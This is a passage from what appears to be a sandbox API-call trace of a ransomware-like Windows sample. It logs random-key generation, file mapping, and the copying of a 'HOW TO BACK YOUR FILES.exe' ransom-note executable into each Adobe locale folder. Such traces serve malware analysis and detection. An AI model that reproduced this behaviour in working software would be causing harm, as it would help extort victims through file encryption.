lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1416) returned 1 [0057.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.128] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cc5b0 [0057.128] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0057.128] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0057.128] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0057.128] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0057.129] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x890, lpName=0x0) returned 0x15c [0057.132] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x890) returned 0x190000 [0057.133] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0057.133] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0057.133] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0057.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0057.133] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0057.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.134] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.134] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.134] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.134] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0057.134] CloseHandle (hObject=0x15c) returned 1 [0057.134] CloseHandle (hObject=0x118) returned 1 [0057.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0057.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.136] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb63a00, ftCreationTime.dwHighDateTime=0x1ce76b0, ftLastAccessTime.dwLowDateTime=0x80220580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xfeb63a00, ftLastWriteTime.dwHighDateTime=0x1ce76b0, nFileSizeHigh=0x0, nFileSizeLow=0x588, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="task64.xml", cAlternateFileName="")) returned 0 [0057.136] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0057.136] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e7ab0 [0057.136] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe") returned="C:\\Program Files (x86)\\Common Files\\Adobe" [0057.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0057.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0057.136] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe") returned 41 [0057.136] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe") returned="C:\\Program Files (x86)\\Common Files\\Adobe" [0057.136] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.136] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.141] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.141] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x538e9e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x538e9e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.141] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.141] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.142] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg" [0057.142] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0057.142] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0057.142] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg") returned 49 [0057.142] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg" [0057.142] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.142] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.148] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.148] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5390ffe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5390ffe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.148] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.148] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.149] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW" [0057.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d35f8 | out: hHeap=0x2b0000) returned 1 [0057.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0057.149] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW") returned 55 [0057.149] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW" [0057.149] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.149] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.154] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.154] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5390ffe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5390ffe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.154] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.154] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.155] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN" [0057.155] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3580 | out: hHeap=0x2b0000) returned 1 [0057.155] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0057.155] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN") returned 55 [0057.155] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN" [0057.155] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.155] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.160] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.160] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53936140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53936140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.160] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.160] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.160] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA" [0057.160] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3508 | out: hHeap=0x2b0000) returned 1 [0057.160] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0057.161] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA") returned 55 [0057.161] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA" [0057.161] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.161] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.166] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.166] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53936140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53936140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.166] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.166] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.166] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR" [0057.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3490 | out: hHeap=0x2b0000) returned 1 [0057.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0057.166] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR") returned 55 [0057.166] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR" [0057.166] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.166] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.171] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.172] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53936140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53936140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.172] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.172] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.172] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE" [0057.172] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3418 | out: hHeap=0x2b0000) returned 1 [0057.172] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0057.172] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE") returned 55 [0057.172] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE" [0057.172] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.172] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.178] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.178] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5395c2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5395c2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.178] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.178] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.178] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI" [0057.178] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d33a0 | out: hHeap=0x2b0000) returned 1 [0057.178] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0057.178] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI") returned 55 [0057.178] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI" [0057.178] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.178] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.183] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.183] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5395c2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5395c2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.184] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.184] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.184] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK" [0057.184] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3328 | out: hHeap=0x2b0000) returned 1 [0057.184] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0057.184] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK") returned 55 [0057.184] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK" [0057.184] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.184] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.189] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.189] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53982400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53982400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.189] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.189] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.189] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU" [0057.189] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0057.189] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0057.189] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU") returned 55 [0057.189] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU" [0057.189] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.189] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.194] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.194] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, 